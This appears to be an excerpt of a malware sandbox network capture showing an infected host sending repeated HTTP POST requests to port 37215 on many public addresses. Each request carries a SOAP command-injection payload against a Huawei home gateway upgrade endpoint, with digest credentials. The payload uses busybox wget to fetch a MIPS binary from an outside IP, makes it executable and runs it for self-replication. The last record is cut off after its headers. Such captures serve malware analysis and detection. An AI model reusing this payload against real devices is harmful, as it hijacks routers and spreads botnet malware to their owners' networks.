3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1022192.168.2.134308884.114.77.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499084949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1023192.168.2.134797241.67.193.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499125004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1024192.168.2.1346378199.234.55.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499165058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1025192.168.2.1349466157.30.137.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499191999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1026192.168.2.1338874157.57.60.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499443054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1027192.168.2.1351416118.12.186.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499464989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1028192.168.2.134047041.173.151.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499511003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1029192.168.2.133955214.72.126.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499531031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1030192.168.2.1342866197.16.161.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499763966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1031192.168.2.1339038113.80.197.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499775887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1032192.168.2.1354090157.188.172.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499802113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
